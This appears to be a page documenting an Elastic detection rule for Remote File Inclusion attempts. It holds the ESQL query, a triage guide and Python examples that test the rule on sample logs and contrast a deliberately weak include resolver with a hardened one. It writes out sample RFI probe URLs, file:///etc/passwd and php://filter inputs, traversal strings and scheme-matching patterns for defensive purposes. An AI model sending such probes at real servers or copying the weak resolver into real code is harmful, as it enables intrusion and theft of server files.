Web Server Potential Remote File Inclusion Activity
This rule detects potential Remote File Inclusion (RFI) activity on web servers. Despite the wording of the rule's own description field, the query does not look for directory traversal: it flags successful (HTTP 200) GET requests whose URL-decoded, lower-cased URL contains a parameter value starting with http://, https://, ftp://, smb:// or file://, or a dotted-quad IPv4 address anywhere after an "=". Two caveats follow directly from the query: the URL is decoded only once, so double-percent-encoded payloads are not matched, and the IPv4 pattern also fires on any four dotted numbers such as a version string. Attackers exploit RFI vulnerabilities to make the application fetch and execute remote content, read sensitive local files, gain system information, or further compromise the server.
Elastic rule (View on GitHub)
[metadata]
creation_date = "2025/12/02"
integration = ["nginx", "apache", "apache_tomcat", "iis"]
maturity = "production"
min_stack_version = "9.2.0"
min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0"
updated_date = "2025/12/08"

[rule]
author = ["Elastic"]
description = """
This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests that
attempt to access sensitive remote files through directory traversal techniques or known file paths. Attackers may
exploit RFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
"""
from = "now-11m"
interval = "10m"
language = "esql"
license = "Elastic License v2"
name = "Web Server Potential Remote File Inclusion Activity"
note = """## Triage and analysis

> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

### Investigating Web Server Potential Remote File Inclusion Activity

This rule identifies successful GET requests that pass a remote URL or raw IP in a parameter, signaling Remote File Inclusion attempts that coerce the app to fetch external content or reveal local files. RFI matters because it enables discovery, leaks sensitive data, and can bootstrap code retrieval for persistence or command-and-control. Example behavior: probing an include endpoint with /index.php?page=http://203.0.113.10/drop.txt to verify remote fetch and execution via a vulnerable loader.

### Possible investigation steps

- Decode the full request URL and parameters, identify the endpoint and parameter names, and confirm with application owners whether passing remote URLs is expected behavior for that route.
- Correlate the event time with outbound connections from the web server to the referenced domain or IP using egress firewall, proxy, DNS, or NetFlow logs to verify whether a fetch occurred.
- Review adjacent web access entries from the same source IP and user agent to detect scanning behavior, varied include parameters, wrapper strings (php://, data://, file://), or local file probes that indicate exploitation attempts.
- Check the referenced remote domain or IP with threat intelligence, and if needed, safely retrieve it in an isolated environment to examine content, redirects, and headers for droppers or callbacks.
- Look for post-inclusion artifacts by checking webroot and temp directories for newly created or modified files, suspicious script writes, and unusual access patterns, and inspect server or application configuration for risky URL include settings.

### False positive analysis

- Applications that legitimately accept full URLs in query parameters for link previews, content proxies, image fetching, or feed importers (e.g., url= or src=) will return 200 and match *=http(s)://*, appearing as RFI despite expected behavior.
- Administrative or diagnostic endpoints that allow users to supply IP addresses or URI schemes (ftp://, smb://, file://) to test connectivity or preview resources (e.g., target=192.168.1.10) can return 200 and trigger this rule even though no inclusion vulnerability is present.

### Response and remediation

- Immediately block offending source IPs and request patterns at the WAF/reverse proxy (e.g., GETs where page=, url=, or src= contains http://, https://, ftp://, smb://, or file://) and temporarily disable the affected include/loader endpoints until fixed.
- Restrict outbound connections from the web server to the domains and IPs referenced in the requests and quarantine the host if 200 OK responses align with remote downloads or wrapper usage such as php://, data://, file://.
- Collect forensic images, then remove newly created or modified scripts in webroot and temp directories (e.g., /var/www, uploads, /tmp), delete unauthorized .htaccess/web.config entries, clear caches, and terminate suspicious processes running under the web server account.
- Redeploy the application from a known-good build, restore clean configuration files, rotate credentials exposed by local file probes (e.g., config.php, .env), invalidate sessions, and verify functionality before returning the service to production.
- Harden by disabling risky features and enforcing strict input controls: set PHP allow_url_include=Off and allow_url_fopen=Off, apply open_basedir restrictions, implement scheme/domain allowlists for any include/load functionality, and sanitize and normalize user-supplied parameters.
- Escalate to incident response and preserve disk and memory images if remote content was fetched and executed, a webshell or unknown script is found in the webroot, or the same actor generates successful 200 RFI-style requests across multiple hosts.
- Enhance monitoring for RFI attempts by tuning WAF rules to alert on suspicious include parameters, enabling detailed web server logging, and setting up alerts for anomalous outbound connections from web servers.
"""
risk_score = 21
rule_id = "45d099b4-a12e-4913-951c-0129f73efb41"
severity = "low"
tags = [
  "Domain: Web",
  "Use Case: Threat Detection",
  "Tactic: Discovery",
  "Tactic: Command and Control",
  "Data Source: Nginx",
  "Data Source: Apache",
  "Data Source: Apache Tomcat",
  "Data Source: IIS",
  "Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
query = '''
from
  logs-nginx.access-*,
  logs-apache.access-*,
  logs-apache_tomcat.access-*,
  logs-iis.access-*
| where
  http.request.method == "GET" and
  http.response.status_code == 200 and
  url.original like "*=*"

| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original))

| where
  Esql.url_original_url_decoded_to_lower like "*=http://*" or
  Esql.url_original_url_decoded_to_lower like "*=https://*" or
  Esql.url_original_url_decoded_to_lower like "*=ftp://*" or
  Esql.url_original_url_decoded_to_lower like "*=smb://*" or
  Esql.url_original_url_decoded_to_lower like "*=file://*" or
  Esql.url_original_url_decoded_to_lower rlike """.*=.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*"""

| keep
  @timestamp,
  Esql.url_original_url_decoded_to_lower,
  source.ip,
  agent.id,
  host.name,
  http.request.method,
  http.response.status_code,
  event.dataset,
  data_stream.namespace

| stats
  Esql.event_count = count(),
  Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower),
  Esql.host_name_values = values(host.name),
  Esql.agent_id_values = values(agent.id),
  Esql.http_request_method_values = values(http.request.method),
  Esql.http_response_status_code_values = values(http.response.status_code),
  Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower),
  Esql.event_dataset_values = values(event.dataset),
  Esql.data_stream_namespace_values = values(data_stream.namespace)
  by source.ip
'''

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1083"
name = "File and Directory Discovery"
reference = "https://attack.mitre.org/techniques/T1083/"

[rule.threat.tactic]
id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"

[[rule.threat]]
framework = "MITRE ATT&CK"

[rule.threat.tactic]
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
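The ESQL query above, re-implemented in Python and run over a handful of constructed nginx combined-format access-log lines. This is an added example for this page, not Elastic's code: the log lines are made up, the ESQL "like" wildcards are approximated as substring containment on the once-decoded, lower-cased URL, and the dotted-quad pattern is the rule's regular expression verbatim. Besides the obvious hit, the sample deliberately includes a double-percent-encoded payload (which a single url_decode() does not unwrap), a file:// probe that returned 500 (filtered out by the status check), a legitimate link-preview endpoint and a "v=1.2.3.4" cache-buster (both flagged, as the false-positive analysis warns), and a POST (ignored by the method check).

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed nginx "combined" access-log lines; not from any real server.
# Line 3 is double percent-encoded and line 4 returned 500 on purpose.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Dec/2025:10:15:01 +0000] "GET /index.php?page=http://203.0.113.10/drop.txt HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.7 - - [02/Dec/2025:10:15:03 +0000] "GET /index.php?page=%68%74%74%70%3A%2F%2F203.0.113.10/drop.txt HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.7 - - [02/Dec/2025:10:15:05 +0000] "GET /index.php?page=%2568ttp%253A%252F%252Fevil.example%252Fdrop.txt HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.7 - - [02/Dec/2025:10:15:07 +0000] "GET /index.php?page=file:///etc/passwd HTTP/1.1" 500 0 "-" "curl/8.4.0"
192.0.2.44 - - [02/Dec/2025:10:16:00 +0000] "GET /preview?url=https://example.org/article HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.45 - - [02/Dec/2025:10:16:30 +0000] "GET /static/app.css?v=1.2.3.4 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
192.0.2.46 - - [02/Dec/2025:10:17:00 +0000] "POST /upload?dest=http://203.0.113.10/ HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# Minimal combined-format parser: client IP, method, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# The five `like "*=<scheme>://*"` clauses, as substrings of the decoded URL.
SCHEMES = ("=http://", "=https://", "=ftp://", "=smb://", "=file://")
# The rule's `rlike` pattern, unchanged: four 1-3 digit groups somewhere after an '='.
IP_RE = re.compile(r".*=.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*")


def parse_line(line):
    """Turn one access-log line into an ECS-style event dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "source.ip": m["ip"],
        "http.request.method": m["method"],
        "url.original": m["url"],
        "http.response.status_code": int(m["status"]),
    }


def decoded_lower(url):
    """eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original)):
    exactly one round of percent-decoding, so %2568ttp stays %68ttp."""
    return unquote(url).lower()


def matches_rule(event):
    """Both `where` stages of the rule applied to a single event."""
    if (event["http.request.method"] != "GET"
            or event["http.response.status_code"] != 200
            or "=" not in event["url.original"]):
        return False
    url = decoded_lower(event["url.original"])
    return any(s in url for s in SCHEMES) or IP_RE.match(url) is not None


def run_rule(log_text):
    """The `stats ... by source.ip` stage: per client IP, the hit count and the
    distinct decoded URLs (count_distinct/values), as {ip: {"event_count", "urls"}}."""
    groups = defaultdict(lambda: {"event_count": 0, "urls": set()})
    for line in log_text.splitlines():
        event = parse_line(line)
        if event and matches_rule(event):
            g = groups[event["source.ip"]]
            g["event_count"] += 1
            g["urls"].add(decoded_lower(event["url.original"]))
    return {ip: {"event_count": g["event_count"], "urls": sorted(g["urls"])}
            for ip, g in groups.items()}


if __name__ == "__main__":
    for ip, g in run_rule(SAMPLE_LOG).items():
        print(f"{ip:14} events={g['event_count']} distinct_urls={len(g['urls'])} {g['urls']}")
```

Running it groups the two encoded variants from 198.51.100.7 into one distinct URL (the ESQL count_distinct would report 1 against an event count of 2), which is the signal that the same probe was retried with different encodings. The double-encoded line is a blind spot of the rule as written; if you see %25-prefixed parameters in your traffic, a second decode pass in a separate rule, or a WAF normalization step ahead of logging, is the practical answer.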
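The hardening advice in the response and remediation guidance (scheme/domain allowlists for any include/load functionality, normalized parameters) and the false-positive case of an endpoint that legitimately accepts URLs, sketched in Python. This is an added example written for this page, not Elastic's code and not a PHP configuration; the template root, the page names, the allowlisted host and the Python language itself are assumptions standing in for whatever server-side stack the application uses. The weak resolver is shown beside the hardened one so the difference the rule is detecting is visible.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed application layout and allowlists (illustrative values, not from the page).
TEMPLATE_ROOT = "/var/www/app/templates"     # the role open_basedir plays at the PHP level
ALLOWED_PAGES = {"home", "about", "contact"}  # logical names the ?page= parameter may take
ALLOWED_FETCH_HOSTS = {"cdn.example.org"}     # domain allowlist for an endpoint that must fetch URLs


class RejectedInput(ValueError):
    """Raised for any parameter value that fails validation."""


def weak_resolve(page):
    """The vulnerable pattern the rule hunts for: the parameter is used as-is, so
    page=http://203.0.113.10/drop.txt becomes a remote fetch (with allow_url_include=On)
    and page=../../etc/passwd a local file read."""
    return page if "://" in page else posixpath.join(TEMPLATE_ROOT, page)


def resolve_local_include(page):
    """Hardened resolver for an include/loader parameter: allowlisted names only, no schemes
    or stream wrappers, and a lexical containment check on the normalized path."""
    # Refuse URLs and PHP-style wrappers (http://, file://, php://, data:) before any lookup.
    if "://" in page or ":" in page.split("/", 1)[0]:
        raise RejectedInput("scheme or wrapper not allowed")
    # Map a logical name, never a path; this alone stops traversal.
    if page not in ALLOWED_PAGES:
        raise RejectedInput("unknown page")
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, page + ".html"))
    # Defence in depth: the normalized path must still live under the template root.
    # normpath is purely lexical; a real loader should also realpath() to defeat symlinks.
    if posixpath.commonpath([TEMPLATE_ROOT, candidate]) != TEMPLATE_ROOT:
        raise RejectedInput("path escapes template root")
    return candidate


def validate_fetch_url(url):
    """For an endpoint that legitimately accepts a URL (the link-preview / image-proxy case in
    the false-positive analysis): allow only https to allowlisted hosts. That rules out the
    ftp/smb/file schemes, raw-IP targets, and userinfo tricks such as
    https://cdn.example.org@203.0.113.10/ in one place."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise RejectedInput("only https is allowed")
    if parts.username or parts.password:
        raise RejectedInput("credentials in URL are not allowed")
    if parts.hostname not in ALLOWED_FETCH_HOSTS:  # .hostname is already lower-cased by urlsplit
        raise RejectedInput("host not allowlisted")
    return url


def rejects(fn, value):
    """True if fn(value) raises RejectedInput; used to exercise the validators."""
    try:
        fn(value)
    except RejectedInput:
        return True
    return False


if __name__ == "__main__":
    probes = ("about", "http://203.0.113.10/drop.txt", "../../etc/passwd",
              "php://filter/convert.base64-encode/resource=index")
    for probe in probes:
        hardened = "rejected" if rejects(resolve_local_include, probe) else resolve_local_include(probe)
        print(f"{probe!r:55} weak -> {weak_resolve(probe):45} hardened -> {hardened}")
```

The point of resolve_local_include is that the allowlist of logical names does the real work; the scheme check and the containment check are there so that a later refactor (say, someone replacing the set with a directory listing) does not silently reopen the hole. validate_fetch_url is the answer to the "link preview" false positive: an endpoint that must take URLs can keep taking them, but the alert from this rule should then be tuned to exclude that route rather than the whole source IP.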
Related rules
- Web Server Local File Inclusion Activity
- Web Server Potential Command Injection Request
- Potential Spike in Web Server Error Logs
- Web Server Discovery or Fuzzing Activity
- Web Server Potential Spike in Error Response Codes